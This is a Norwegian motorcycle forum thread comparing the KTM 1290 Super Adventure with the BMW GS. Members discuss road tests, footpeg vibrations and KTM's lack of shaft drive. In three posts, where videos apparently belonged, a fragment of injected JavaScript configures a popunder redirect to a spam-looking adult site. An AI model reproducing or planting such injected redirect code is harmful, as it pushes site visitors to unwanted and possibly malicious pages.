KTM 1290 Super Adventure - BMW R1200/1250GS utfordrer?

Forum for fulleffekt tung-MC
Svar
Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Begynner å komme skrevne magasintester og ikke minst testvideoer med kommentarer.
Her en som ble lagt ut for bare noen timer siden:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Vil nok få mye oppmerksomhet i tiden framover, denne nye Super Adenture'en...

Har for øvrig hørt rykter om at det kommer færre hit til landet enn hva man hadde forventet på forhånd.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Kommer ikke til å legge ut en hel haug med testrapporter her, men et par må kunne tåles... :P :p .
Som f.eks. denne:


http://www.bennetts.co.uk/bikesocial/re ... NJl7o7dkfx
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
mammut89
Innlegg: 248
Registrert: 07 jan 2012, 15:28
Motorsykkelen din: S1000R
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av mammut89 »

den så veldig frisk ut og en skikkelig konkurrent til GS
Kjørelengde : 2010: 6000km , 2011: 13 000km , 2012: 16 000km, 2013: 9000km, 2014: 14 000
Banedager: 2010: 0 , 2011: 4 , 2012: 2, 2013: 2, 2014: 2 2014: 3

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

En aldri så liten stilstudie:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Testene fra Kanariøyene legges ut forløpende. Her en av de siste...:

..."an animal of the most predatory nature"...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Det som sies er helt gresk, men bildene snakker et språk alle skjønner... :-) :

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

En av de nyeste kjøretestrapportene:

https://www.asphaltandrubber.com/review ... re-review/
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Haymaker
Innlegg: 576
Registrert: 29 jul 2014, 10:21
Motorsykkelen din: Suzuki GSR600 2007

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av Haymaker »

Setevarmer med 2 soner og ulike nivåer.
Ekstrautstyret på disse nye syklene.. :twisted

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av ojda »

AJ skrev:En av de nyeste kjøretestrapportene:

https://www.asphaltandrubber.com/review ... re-review/

Sakset: (The huge v-twin has a broad and strong powerband, but from 6,000 rpm onwards the real muscle shows. Above this threshold the vibrations in the footpegs disappear as well, which only encourages you to twist the throttle further).


Ups :redface Leser fothvilervibrasjoner under 6000 rpm :-k
Det var det jeg hang meg mest opp i på 1190`n :-k
Får håpe det ikke er like mye som på den jeg kjørte.
Det var ikke så lenge jeg prøvde den, men jeg
tror ikke jeg hadde vært lykkelig etter en lang dag på den :scratch
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

Eneste testrapporten så langt som nevner vibrasjoner i fothvilerne.
Så får vi se hvor merkbare og evt. irriterende dette er.
Har hatt dette mer eller mindre på alle syklene jeg har hatt. Mest merkbart på Stelvio'en, men likevel minst irriterende. Mest plagsomt på Tiger 1050'en, faktisk, hvor vibrasjonene gjorde at den ene foten "sovnet". Litt bedre da med "masserende" vibber, som på Stelvio... :P :p
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Zadnez
Innlegg: 600
Registrert: 19 mar 2013, 07:59
Motorsykkelen din: BMW S1000R 2014
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av Zadnez »

dere har ikke opplevd fotvibrasjoner før dere har kjørt Harley i Dyna-familien. Den siste jeg hadde var det sånn at foten gled av om du ikke presset mot :roll
Katalysator er en kul ting som ikke bør skjules

Brukeravatar
Bjerknez
Innlegg: 22911
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av Bjerknez »

Har ikke opplevd dette selv tror jeg, men kan se for meg at virbrasjoner i fothvilere vil være slitsomt i lengden. Håper ikke dette blir et problem på en slik type sykkel :-)å

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av ojda »

Bjerknez skrev:Har ikke opplevd dette selv tror jeg, men kan se for meg at virbrasjoner i fothvilere vil være slitsomt i lengden. Håper ikke dette blir et problem på en slik type sykkel :-)å
Slitsomme vibrasjoner i fothvilere er slitsomme :eh
Det er ofte veldig liten forskjell i frekvens og intensitet som skal til
for å gjøre en stor forskjell :-k
Jeg kjørte ikke KTM1190 Adventure R mer en ca 1/2 time, og det var langt fra
nok til å konkludere.
Men det var mer en nok til å stadfeste at: Her vibrerte det gitt :knegg
Styret var derimot helt dødt :thumleft
Noe det ikke er på Tigern, så det er dempet i etterhånd :prf
Det at AJ`n sier det er den første testen
han ser dette nevnt, ser jeg på som et positivt tegn :[-o<
Jeg er litt på tå i forhåld til denne sykkelen, da den helt klart er veldig interessant
som arvtager etter MamaTiger når den dagen måtte komme.
Største feilen de i mine øyne har gjort med den,
er at de har GLEMT å montere kardangen da de skrudde den sammen.
Men det er vel noe vi aldrig vil se fra KTM :redface
Sist redigert av ojda den 09 feb 2015, 09:53, redigert 1 gang totalt.
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av ojda »

Zadnez skrev:dere har ikke opplevd fotvibrasjoner før dere har kjørt Harley i Dyna-familien. Den siste jeg hadde var det sånn at foten gled av om du ikke presset mot :roll
For egen del kan jeg si: Det vil aldrig skje :evil
Det var en liten periode i fjor jeg tenkte jeg hadde lyst til å prøve en V-Rod,
men jeg kom på bedre tanker =;
Jeg kan være sta, å her jeg sagt jeg aldrig vil gjøre en ting, så blir det sånn :P :p
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Online
Brukeravatar
AJ
Administrator
Innlegg: 37874
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?

Legg inn av AJ »

ojda skrev: Jeg er litt på tå i forhåld til denne sykkelen, da den helt klart er veldig interessant
som arvtager etter MamaTiger når den dagen måtte komme.
Største feilen de i mine øyne har gjort med den,
er at de har GLEMT å montere kardangen da de skrudde den sammen.
Men det er vel noe vi aldrig vil se fra KTM :redface
Noen har slått fast at det ikke finnes det minste spor av kardang KTM's DNA...
Husker ikke lenger hvem denne 'noen' er eller hvor jeg leste det. Men tror nok vedkommende har ganske så rett i dette.
Er ganske sikker på at vi aldri kommer til å se kardangsykkel fra KTM. Like sikker som at vi aldri får gleden av (?) å plante ræven ned på en KTM cruiser ala japan-cruiser, MG California, H-D og Goldwing... :knegg

Ducati Multistrada har heller ingen kardang på sin oppaterte versjon. Tror neppe Bologna-ingeniørene sysler med tanke om å gjøre det i framtiden heller...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Svar